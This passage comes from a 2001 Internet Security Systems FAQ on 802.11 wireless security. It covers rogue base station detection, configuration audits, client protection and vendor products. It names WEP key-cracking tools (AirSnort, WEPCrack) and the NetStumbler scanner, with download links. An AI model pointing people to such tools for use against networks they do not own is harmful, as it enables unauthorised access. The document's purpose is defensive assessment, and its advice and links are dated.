[ Pobierz całość w formacie PDF ]
many OS fingerprinting technologies use this method for
identifying the OS type. This concept can be applied to the base
stations.
* From a wireless network search, an organization can identify these
rogue base stations by simply setting up a 2.4 GHz sniffer that
identifies 802.11 packets in the air. By looking at the packets,
you may find the IP addresses to help identify which network they
are on. In a densely populated area with many businesses close
together, running a sniffer may pick up more the intended
organization's traffic, but a close neighboring company.
[3.5] Base Station Security Assessments
An organization can examine and analyze the base station
configuration. A security audit and assessment could determine whether
the passwords and community words are still default or easily guessed
and if better security modes have been enabled like encryption.
With router ACLs and firewall rules, an organization can minimize
access to the SNMP agents and other interfaces on the base station. A
security assessment can determine how widely accessible is the
configuration interfaces to the base stations are allowed to within
the organization.
[3.6] Wireless Client Protection
The wireless clients should be assessed for having the following
security technologies:
* firecell (distributed personal firewalls) - lock down who can gain
access to the client.
* VPN - adds another layer of encryption and authentication beyond
what 802.11 can provide.
* intrusion detection - identify and minimize attacks from
intruders, worms, viruses, Trojans and backdoors.
* desktop scanning - identify security misconfigurations on the
client.
[4] Who is making 802.11 Security Solutions?
[4.1] 802.11 Gateway Infrastructure
* BlueSocket: The WG-1000 Wireless Gateway(TM) offers a single
scalable solution to the security, quality of service (QoS) and
management issues facing enterprises and service providers that
deploy wireless LANs based on the IEEE 802.11b and Bluetooth(TM)
standards.
* EcuTel: Viatores Secure WLAN edition is different from legacy
virtual private networks (VPNs) in that it maintains VPN and
Seite 11
Unbenannt
application sessions uninterrupted with no configuration or
re-boot required. Viatores combines two advanced protocols for
mobility and security to enable roaming from LANs to WLANs and
between WLAN subnets seamlessly and securely. Application sessions
and security tunnels are maintained while the user moves from one
subnet to another. Roaming users can communicate easily with
colleagues, regardless of where they are or how they are
connected, because Viatores maintains a single network address.
Viatores Secure WLAN edition includes:
+ Industry-strength secure communication well beyond the WEP
standard;
+ Seamless roaming from wired to wireless networks and between
different wireless networks;
+ Support for two-way, peer-to-peer communication;
+ Data confidentiality and integrity, including key exchanges,
digital signatures, and industry-strength encryption;
+ Option to upgrade to secure and seamless roaming from public
networks.
* NetMotion Wireless - NetMotion Mobility provides a VPN designed to
work with WLAN security.
http://www.netmotionwireless.com/resource/whitepapers/netmotion_se
curity.asp has an overview of wireless security and how NetMotion
Mobility(TM) prevents unauthorized users from accessing your
system and stops eavesdropping, replay, and other network-level
attacks.
[4.2] 802.11 Security Analysis Tools
* AirSnort is a wireless LAN (WLAN) tool that recovers encryption
keys. It operates by passively monitoring transmissions, computing
the encryption key when enough packets have been gathered.
AirSnort will work for both 40 or 128 bit encryption.
+ http://freshmeat.net/projects/airsnort/
+ http://www.dachb0den.com/projects/bsd-airtools.html
* WEPCrack is a to ol that cracks 802.11 WEP encryption keys using
the latest discovered weakness of RC4 key scheduling.
+ http://sourceforge.net/projects/wepcrack
* Network Stumbler scans for networks roughly every second and logs
all the networks it runs into--including the real SSIDs, the AP's
MAC address, the best signal-to-noise ratio encountered, and the
time you crossed into the network's space. If you add a GPS
receiver to the notebook, it logs the exact latitude and longitude
of the AP. Network Stumbler does not use promiscuous mode. Thus,
by simply turning off broadcast pings hides the Access Point from
NetStumbler. Now NetStumbler website includes a PocketPC
MiniStumbler.
+ http://www.netstumbler.com/
+ http://www.netstumbler.com/download.php?op=getit&lid=21
PocketPC MiniStumbler
* Internet Scanner 6.2, the market leading network vulnerability
assessment tool, was the first to assess many 802.11b security
checks. 802.11 checks are in several X-Press Updates (XPU 4.9 and
4.10). This is done by doing assessing via the wired network and
contacting the management interface.
* Wireless Scanner 1.0, designed to look for security issues via the
802.11b airwaves. Has a penetration testing mode and discovery
mode. Uses promiscuous mode, thus capable of capturing the raw
802.11b packets for forensics analysis and replay. Even if
broadcast pings are turned off, Wireless Scanner will still catch
any Access Points if it sends any kind of traffic due to using
promiscuous mode.
+ http://www.iss.net/download/ Evaluation copy of Wireless
Scanner.
+ https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/home.php
WS1.0 Knowledge Base
* RealSecure 6.0, the market leading IDS, was the first to monitor
many 802.11b attacks. Recommend to make sure you are up to the
latest X-Press Updates. 802.11 checks for IDS were in XPU 3.1.
Recommend putting IDS behind the Access Point, directly on any
Seite 12
Unbenannt
servers and desktops behind the access point, as well as, on any
wireless clients.
* BlackICE PC Protection 3.5, personal firewall with IDS capability,
is used on wireless laptops and desktops to protect against client
to client attacks.
[5] About Internet Security System's Wireless 802.11b Solution
ISS offers the comprehensive wireless security solution:
* Wireless Security Assessments and Penetration Testing
* Wireless Policy Design and Workshops
* Vulnerability Scanning with specific 802.11 configuration checks
* Intrusion Detection for Wireless LAN networks
* Wireless 802.11 Security Classes
* ISS X-Force Advisories:
+ http://xforce.iss.net/alerts/advise83.php 802.11 SNMP Auth.
Flaw
+ http://xforce.iss.net/alerts/advise84.php WEP Key exposed via
SNMP
Copyright © 2001, Internet Security Systems. All rights reserved.
This document may be redistributed only in its entirety with version
date, authorship notice, and acknowledgements intact. No part of it
may be sold for profit or incorporated in a commercial document
without the permission of the copyright holder. Permission will be
granted for complete electronic copies to be made available as an
archive or mirror service on the condition that the author be notified
and that the copy be kept up to date. This document is provided as is
without any express or implied warranty.
****
Christopher W. Klaus
Founder and CTO
Internet Security Systems
Email: cwkpublic@iss.net
Seite 13
[ Pobierz całość w formacie PDF ]